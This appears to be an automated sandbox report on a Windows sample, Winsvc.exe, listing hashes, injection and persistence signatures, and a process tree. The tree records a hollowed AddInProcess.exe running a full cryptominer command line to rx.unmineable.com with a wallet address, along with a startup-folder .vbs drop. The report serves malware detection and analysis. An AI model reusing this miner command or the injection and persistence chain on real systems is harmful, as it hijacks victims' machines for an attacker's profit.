Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 18:03
Static task
static1
Behavioral task
behavioral1
Sample
Winsvc.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Winsvc.exe
Resource
win10v2004-20241007-en
General
-
Target
Winsvc.exe
-
Size
1.6MB
-
MD5
3e4461418de7a12e7951ccf51fe4d4d3
-
SHA1
d7332419080c1a8eaef111439feb71bda300a1d3
-
SHA256
96c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760
-
SHA512
b01982718c3f62059f086c3274f9f8d1c98bbb9bcc187bfa466b369d08818cd2fe06e0949256eddbfd6f26b3fd5428ea8008d49adf6f233282f08c8dce4e9553
-
SSDEEP
24576:9sRgQPPLVkiouiRjaMkVRu9JS70cJscGh6U8mEGKacNpVAADNi5GeZTOjo:9sV3LGjpkVIJunw98mTKfVAyNioSTO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2004 created 3440 2004 Winsvc.exe 56 PID 4696 created 3440 4696 InnerException.exe 56 PID 2084 created 3440 2084 RegSvcs.exe 56 -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FailedAssemblyInfo.vbs Winsvc.exe -
Executes dropped EXE 2 IoCs
pid Process 4696 InnerException.exe 3388 InnerException.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2004 set thread context of 1520 2004 Winsvc.exe 83 PID 4696 set thread context of 3388 4696 InnerException.exe 98 PID 3388 set thread context of 2084 3388 InnerException.exe 100 PID 2084 set thread context of 4272 2084 RegSvcs.exe 101 PID 4272 set thread context of 2900 4272 RegSvcs.exe 105 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2004 Winsvc.exe 4696 InnerException.exe 2084 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe 4272 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2004 Winsvc.exe Token: SeDebugPrivilege 2004 Winsvc.exe Token: SeDebugPrivilege 1520 Winsvc.exe Token: SeDebugPrivilege 4696 InnerException.exe Token: SeDebugPrivilege 4696 InnerException.exe Token: SeDebugPrivilege 3388 InnerException.exe Token: SeDebugPrivilege 2084 RegSvcs.exe Token: SeDebugPrivilege 2084 RegSvcs.exe Token: SeDebugPrivilege 4272 RegSvcs.exe Token: SeLockMemoryPrivilege 2900 AddInProcess.exe Token: SeLockMemoryPrivilege 2900 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2900 AddInProcess.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 2004 wrote to memory of 1520 2004 Winsvc.exe 83 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 4696 wrote to memory of 3388 4696 InnerException.exe 98 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 3388 wrote to memory of 2084 3388 InnerException.exe 100 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 2084 wrote to memory of 4272 2084 RegSvcs.exe 101 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 PID 4272 wrote to memory of 2900 4272 RegSvcs.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"C:\Users\Admin\AppData\Local\Temp\Winsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2900
-
-
-
C:\Users\Admin\AppData\Roaming\Access\InnerException.exeC:\Users\Admin\AppData\Roaming\Access\InnerException.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD53e4461418de7a12e7951ccf51fe4d4d3
SHA1d7332419080c1a8eaef111439feb71bda300a1d3
SHA25696c7d1d5dab0c8060f3220816e3e49461ef328643d520545ffc8aa05ddd76760
SHA512b01982718c3f62059f086c3274f9f8d1c98bbb9bcc187bfa466b369d08818cd2fe06e0949256eddbfd6f26b3fd5428ea8008d49adf6f233282f08c8dce4e9553